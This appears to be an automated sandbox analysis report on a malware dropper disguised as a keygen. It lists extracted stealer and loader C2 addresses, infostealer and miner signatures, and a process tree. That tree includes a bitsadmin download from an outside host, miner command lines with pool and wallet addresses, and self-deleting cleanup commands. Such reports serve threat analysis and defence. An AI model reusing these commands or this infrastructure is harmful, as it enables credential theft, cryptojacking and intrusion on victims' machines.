Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    1802s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 13:38

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 32 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2700
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2716
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2604
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2388
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2368
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
          • Modifies registry class
          PID:1836
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1380
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1296
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1228
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1092
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1044
                  • C:\Users\Admin\AppData\Roaming\drrvgdc
                    C:\Users\Admin\AppData\Roaming\drrvgdc
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4820
                  • C:\Users\Admin\AppData\Roaming\bervgdc
                    C:\Users\Admin\AppData\Roaming\bervgdc
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5072
                    • C:\Users\Admin\AppData\Roaming\bervgdc
                      C:\Users\Admin\AppData\Roaming\bervgdc
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6104
                  • C:\Users\Admin\AppData\Roaming\drrvgdc
                    C:\Users\Admin\AppData\Roaming\drrvgdc
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4336
                  • C:\Users\Admin\AppData\Roaming\bervgdc
                    C:\Users\Admin\AppData\Roaming\bervgdc
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:6064
                    • C:\Users\Admin\AppData\Roaming\bervgdc
                      C:\Users\Admin\AppData\Roaming\bervgdc
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6068
                  • C:\Windows\system32\rundll32.exe
                    C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll",AotYqZ
                    2⤵
                    • Windows security modification
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:4280
                  • C:\Users\Admin\AppData\Roaming\drrvgdc
                    C:\Users\Admin\AppData\Roaming\drrvgdc
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4364
                  • C:\Users\Admin\AppData\Roaming\bervgdc
                    C:\Users\Admin\AppData\Roaming\bervgdc
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5040
                    • C:\Users\Admin\AppData\Roaming\bervgdc
                      C:\Users\Admin\AppData\Roaming\bervgdc
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5860
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:60
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:516
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1828
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:216
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:204
                      • C:\ProgramData\5096488.exe
                        "C:\ProgramData\5096488.exe"
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of WriteProcessMemory
                        PID:2664
                        • C:\ProgramData\Windows Host\Windows Host.exe
                          "C:\ProgramData\Windows Host\Windows Host.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:2248
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3880
                      • C:\Users\Admin\AppData\Local\Temp\is-146MM.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-146MM.tmp\Install.tmp" /SL5="$70080,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3996
                        • C:\Users\Admin\AppData\Local\Temp\is-6CVO3.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-6CVO3.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4008
                          • C:\Program Files\Microsoft Office\YNRNZUYQEG\ultramediaburner.exe
                            "C:\Program Files\Microsoft Office\YNRNZUYQEG\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3308
                            • C:\Users\Admin\AppData\Local\Temp\is-F0QJO.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-F0QJO.tmp\ultramediaburner.tmp" /SL5="$9003E,281924,62464,C:\Program Files\Microsoft Office\YNRNZUYQEG\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:2772
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:3472
                          • C:\Users\Admin\AppData\Local\Temp\d0-f877c-36f-baeb3-5552c8695b167\Laesejezhushi.exe
                            "C:\Users\Admin\AppData\Local\Temp\d0-f877c-36f-baeb3-5552c8695b167\Laesejezhushi.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4044
                          • C:\Users\Admin\AppData\Local\Temp\f7-edb3e-fae-27bbc-245e15e39f760\Secegunaemo.exe
                            "C:\Users\Admin\AppData\Local\Temp\f7-edb3e-fae-27bbc-245e15e39f760\Secegunaemo.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2144
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jto2bs0l.tmm\instEU.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4804
                              • C:\Users\Admin\AppData\Local\Temp\jto2bs0l.tmm\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\jto2bs0l.tmm\instEU.exe
                                7⤵
                                • Executes dropped EXE
                                PID:5092
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fuotyu1q.rgr\gpooe.exe & exit
                              6⤵
                                PID:4960
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jgjlmj3o.vdz\google-game.exe & exit
                                6⤵
                                  PID:1656
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2zydpax3.qm5\md1_1eaf.exe & exit
                                  6⤵
                                    PID:4448
                                    • C:\Users\Admin\AppData\Local\Temp\2zydpax3.qm5\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\2zydpax3.qm5\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5080
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bigjbugt.j5a\y1.exe & exit
                                    6⤵
                                      PID:3884
                                      • C:\Users\Admin\AppData\Local\Temp\bigjbugt.j5a\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\bigjbugt.j5a\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:5028
                                        • C:\Users\Admin\AppData\Local\Temp\e8C5RCjHlU.exe
                                          "C:\Users\Admin\AppData\Local\Temp\e8C5RCjHlU.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5212
                                          • C:\Users\Admin\AppData\Roaming\1619192792398.exe
                                            "C:\Users\Admin\AppData\Roaming\1619192792398.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619192792398.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:2212
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\e8C5RCjHlU.exe"
                                            9⤵
                                              PID:6092
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:1016
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bigjbugt.j5a\y1.exe"
                                            8⤵
                                              PID:5372
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:5048
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ustlohey.p3x\toolspab1.exe & exit
                                          6⤵
                                            PID:4756
                                            • C:\Users\Admin\AppData\Local\Temp\ustlohey.p3x\toolspab1.exe
                                              C:\Users\Admin\AppData\Local\Temp\ustlohey.p3x\toolspab1.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4212
                                              • C:\Users\Admin\AppData\Local\Temp\ustlohey.p3x\toolspab1.exe
                                                C:\Users\Admin\AppData\Local\Temp\ustlohey.p3x\toolspab1.exe
                                                8⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: MapViewOfSection
                                                PID:4824
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hubrqfej.fc0\SunLabsPlayer.exe /S & exit
                                            6⤵
                                              PID:5088
                                              • C:\Users\Admin\AppData\Local\Temp\hubrqfej.fc0\SunLabsPlayer.exe
                                                C:\Users\Admin\AppData\Local\Temp\hubrqfej.fc0\SunLabsPlayer.exe /S
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                PID:4960
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:660
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:5756
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5944
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5832
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Blocklisted process makes network request
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4152
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5776
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                            8⤵
                                                            • Checks for any installed AV software in registry
                                                            PID:6072
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                                PID:2148
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:4852
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pC2KRn2c9fiF7FlK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:4724
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plg2ZLYGSphKc5Eq -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5952
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:2728
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4708
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5240
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5144
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4636
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        PID:4756
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                                                          9⤵
                                                                          • Loads dropped DLL
                                                                          • Checks whether UAC is enabled
                                                                          • Drops file in System32 directory
                                                                          PID:5348
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:1176
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:5520
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:4520
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2280
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh55A5.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4352
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5816
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdiqde4f.3w1\GcleanerWW.exe /mixone & exit
                                                                          6⤵
                                                                            PID:3004
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j2fe2xa3.eml\inst.exe & exit
                                                                            6⤵
                                                                              PID:1512
                                                                              • C:\Users\Admin\AppData\Local\Temp\j2fe2xa3.eml\inst.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\j2fe2xa3.eml\inst.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5400
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uaph5elj.aim\c7ae36fa.exe & exit
                                                                              6⤵
                                                                                PID:5224
                                                                                • C:\Users\Admin\AppData\Local\Temp\uaph5elj.aim\c7ae36fa.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\uaph5elj.aim\c7ae36fa.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5560
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\if3f2q2v.c4g\app.exe /8-2222 & exit
                                                                                6⤵
                                                                                  PID:5460
                                                                                  • C:\Users\Admin\AppData\Local\Temp\if3f2q2v.c4g\app.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\if3f2q2v.c4g\app.exe /8-2222
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5696
                                                                                    • C:\Users\Admin\AppData\Local\Temp\if3f2q2v.c4g\app.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\if3f2q2v.c4g\app.exe" /8-2222
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:5036
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                          2⤵
                                                                            PID:4152
                                                                            • C:\Users\Admin\AppData\Roaming\18E8.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\18E8.tmp.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3904
                                                                              • C:\Users\Admin\AppData\Roaming\18E8.tmp.exe
                                                                                "C:\Users\Admin\AppData\Roaming\18E8.tmp.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Checks processor information in registry
                                                                                PID:4660
                                                                            • C:\Users\Admin\AppData\Roaming\1BD7.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1BD7.tmp.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4336
                                                                              • C:\Windows\system32\msiexec.exe
                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w26680@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                4⤵
                                                                                  PID:5084
                                                                                • C:\Windows\system32\msiexec.exe
                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w4563 --cpu-max-threads-hint 50 -r 9999
                                                                                  4⤵
                                                                                  • Blocklisted process makes network request
                                                                                  PID:3512
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                3⤵
                                                                                  PID:4268
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 127.0.0.1
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:2148
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:5348
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                2⤵
